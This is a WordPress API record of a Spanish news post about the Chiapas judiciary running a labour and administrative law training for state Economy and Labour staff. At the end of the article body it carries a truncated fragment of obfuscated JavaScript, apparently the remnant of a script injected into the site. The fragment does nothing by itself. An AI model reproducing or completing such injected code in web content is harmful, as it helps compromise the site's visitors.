{"id":11583,"date":"2023-08-29T04:42:14","date_gmt":"2023-08-29T04:42:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11583"},"modified":"2023-08-29T04:42:14","modified_gmt":"2023-08-29T04:42:14","slug":"capacita-poder-judicial-a-servidoras-y-servidores-publicos-de-la-secretaria-de-economia-y-trabajo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11583","title":{"rendered":"Capacita Poder Judicial a servidoras y servidores p\u00fablicos de la Secretar\u00eda de Econom\u00eda y Trabajo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"341\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1693284119969.jpg\" alt=\"\" class=\"wp-image-11584\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1693284119969.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1693284119969-300x142.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n. 28 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial (IFPyCJ), dio comienzo a una capacitaci\u00f3n en Materia Laboral y Administrativa, dirigida a servidoras y servidores p\u00fablicos de la Secretar\u00eda de Econom\u00eda y del Trabajo.El objetivo de esta capacitaci\u00f3n, es que las y los participantes conozcan el funcionamiento de las administraciones como \u00f3rganos internos, el quehacer de los juzgados y las responsabilidades administrativas, con especial \u00e9nfasis en el tema de las notificaciones y la forma adecuada de realizarlas a \u00f3rganos estatales y municipales.Esta actividad, donde participan de manera presencial 25 servidoras y servidores de la Secretar\u00eda de Econom\u00eda y del Trabajo, es impartida por el secretario de Estudio y Cuenta del Tribunal Administrativo del Estado de Chiapas, Sergio Alejandro Ballinas Zepeda, quien es el encargado de desarrollar los t\u00f3picos importantes durante las tres sesiones programadaa, as\u00ed como disipar las dudas de las y los participantes.Cabe mencionar que, esta capacitaci\u00f3n forma parte de un programa constante de profesionalizaci\u00f3n a integrantes de la gran familia judicial, instituciones, dependencias, y de diversos sectores de la sociedad chiapaneca, que se desarrolla a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial.Con estas actividades, el Poder Judicial del Estado y el magistrado presidente Guillermo Ramos P\u00e9rez, evidencian su compromiso por la capacitaci\u00f3n constante de las y los servidores p\u00fabicos chiapanecos.#Tribunaldepuertasabiertas #PJEChiapas #JusticiaParaTodasyTodos<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 28 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial (IFPyCJ), dio comienzo a una capacitaci\u00f3n en Materia Laboral y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11584,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-11583","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11583","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11583"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11583\/revisions"}],"predecessor-version":[{"id":11585,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11583\/revisions\/11585"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11584"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11583"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11583"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11583"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}